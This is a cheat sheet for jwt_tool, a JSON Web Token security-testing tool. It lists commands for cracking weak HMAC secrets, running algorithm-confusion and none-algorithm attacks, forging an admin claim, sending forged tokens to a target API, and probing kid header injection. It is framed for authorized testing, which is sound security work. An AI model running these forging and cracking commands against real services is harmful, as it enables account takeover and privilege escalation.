jwt_tool Cheat Sheet
JSON Web Token testing for algorithm confusion, weak secrets, and claim tampering.
Overview
jwt_tool audits JWTs used in APIs and web apps: decode claims, test none/algorithm confusion, brute-force weak HMAC secrets, and tamper with payloads on authorized targets.
Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.
Install
pip install jwt-toolor
git clone https://github.com/ticarpi/jwt_tool.gitcd jwt_tool && pip install -r requirements.txtEssential commands
Decode and scan token
python3 jwt_tool.py -hpython3 jwt_tool.py <JWT_STRING>Tamper payload claim
python3 jwt_tool.py <JWT> -TCommon workflows
Full automated scan —
python3 jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9... -M atpython3 jwt_tool.py eyJhbG... -C -d /usr/share/wordlists/jwt-secrets.txtAlgorithm confusion (RS256 → HS256) —
python3 jwt_tool.py <JWT> -X aNone algorithm —
python3 jwt_tool.py <JWT> -X nForge with known secret —
python3 jwt_tool.py <JWT> -I -pc name -pv admin -S hs256 -p "secret123"Send forged token to API —
python3 jwt_tool.py <JWT> -R -t "https://target.example/api/me" -rh "Authorization: Bearer eyJ..."Flags reference
-M at | All tests mode |
|---|---|
-C | Crack HMAC secret (wordlist) |
-d FILE | Dictionary for cracking |
-X a | Algorithm confusion exploit |
-X n | None algorithm |
-T | Interactive tamper |
-I | Inject / forge claims |
-pc / -pv | Payload claim / value |
-S | Signing algorithm |
-p | Password / secret |
-R | Send request with token |
-t URL | Target URL |
-rh | Request header with token |
Tips
- Capture JWT from Burp (Authorization header or cookie access_token).
- Check kid header attacks (path traversal, SQLi in key lookup) manually if jwt_tool flags them.
- After forging, test privilege escalation (role, admin, sub) only within scope.
- Asymmetric tokens: obtain public key from /.well-known/jwks.json or cert endpoints.